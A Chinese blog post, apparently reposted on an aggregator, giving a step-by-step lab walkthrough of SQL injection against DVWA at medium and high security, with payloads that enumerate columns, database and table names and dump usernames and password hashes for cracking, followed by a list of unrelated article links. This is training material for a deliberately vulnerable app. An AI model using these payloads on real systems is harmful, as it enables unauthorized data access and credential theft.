当前位置: 首页 > news >正文

DVWA(SQL注入)medium、high

medium 

(1)判断注入是字符型还是数值型

数值型,获得了用户信息。

id =1 or 1=1

(2)查询字段数

为3时报错,代表字段数为2。

1 order by 3

(3)显示字段顺序

1 union select 1,2

(4)获取当前数据库名

1 union select 1, database() #

 

(5)获取当前数据库的表名

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

(6)获取数据

结果可以使用md5进行爆破

1 union select user,password from users

high

查看源代码,增加了一个limit 1,使用#注释,其他操作不变。

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • ESXI加入VMware现有集群提示常规性错误
  • RabbitMQ之基于注解声明队列交换机:使用@RabbitListener实现消息监听
  • Java日志框架
  • npm、pnpm、yarn镜像源设置
  • 深入探究Liunx服务器内存:模拟程序实际占用与缓存占用内存
  • 深入理解 Go 语言信号量 Semaphore
  • 数据库事务( 五 ) Spring管理事务的几道面试题
  • 史上最详细ArduinoESP32 外部中断
  • python爬虫学习记录-请求模块urllib3
  • lvs实战项目-dr模式实现
  • github使用gh-pages部署vue静态网站(简单易懂)
  • gorm不定参数
  • 第129天:内网安全-横向移动WmiSmbCrackMapExecProxyChainsImpacket
  • SOPHGO算能科技BM1684盒子占用空间满的问题解决
  • AI大模型加持的新一代网络舆情系统——“速途观澜”舆情感知引擎发布上线
  • 《剑指offer》分解让复杂问题更简单
  • 【5+】跨webview多页面 触发事件(二)
  • C++回声服务器_9-epoll边缘触发模式版本服务器
  • docker容器内的网络抓包
  • hadoop集群管理系统搭建规划说明
  • vue-cli在webpack的配置文件探究
  • 基于Volley网络库实现加载多种网络图片(包括GIF动态图片、圆形图片、普通图片)...
  • 容器服务kubernetes弹性伸缩高级用法
  • 深度学习中的信息论知识详解
  • 手写双向链表LinkedList的几个常用功能
  • puppet连载22:define用法
  • scrapy中间件源码分析及常用中间件大全
  • ​iOS实时查看App运行日志
  • ‌‌雅诗兰黛、‌‌兰蔻等美妆大品牌的营销策略是什么?
  • # Redis 入门到精通(八)-- 服务器配置-redis.conf配置与高级数据类型
  • $.each()与$(selector).each()
  • (6)STL算法之转换
  • (SpringBoot)第七章:SpringBoot日志文件
  • (附源码)springboot优课在线教学系统 毕业设计 081251
  • (十三)Java springcloud B2B2C o2o多用户商城 springcloud架构 - SSO单点登录之OAuth2.0 根据token获取用户信息(4)...
  • . NET自动找可写目录
  • .【机器学习】隐马尔可夫模型(Hidden Markov Model,HMM)
  • .NET Standard / dotnet-core / net472 —— .NET 究竟应该如何大小写?
  • .Net 基于MiniExcel的导入功能接口示例
  • .Net开发笔记(二十)创建一个需要授权的第三方组件
  • @Autowired 与@Resource的区别
  • [ Socket学习 ] 第一章:网络基础知识
  • [AndroidStudio]_[初级]_[修改虚拟设备镜像文件的存放位置]
  • [C]编译和预处理详解
  • [C++]C++基础知识概述
  • [C++]类和对象【下】
  • [C++从入门到精通] 14.虚函数、纯虚函数和虚析构(virtual)
  • [datastore@cyberfear.com].Elbie、[thekeyishere@cock.li].Elbie勒索病毒数据怎么处理|数据解密恢复
  • [FC][常见Mapper IRQ研究]
  • [IE编程] IE8 新增的C++开发接口
  • [INSTALL_FAILED_TEST_ONLY],Android开发出现应用未安装
  • [JavaWeb学习] Spring Ioc和DI概念思想
  • [k8s系列]:kubernetes·概念入门
  • [LeetCode]-225. 用队列实现栈-232. 用栈实现队列
  • [Linux] 关于执行文件路径的变量:$PATH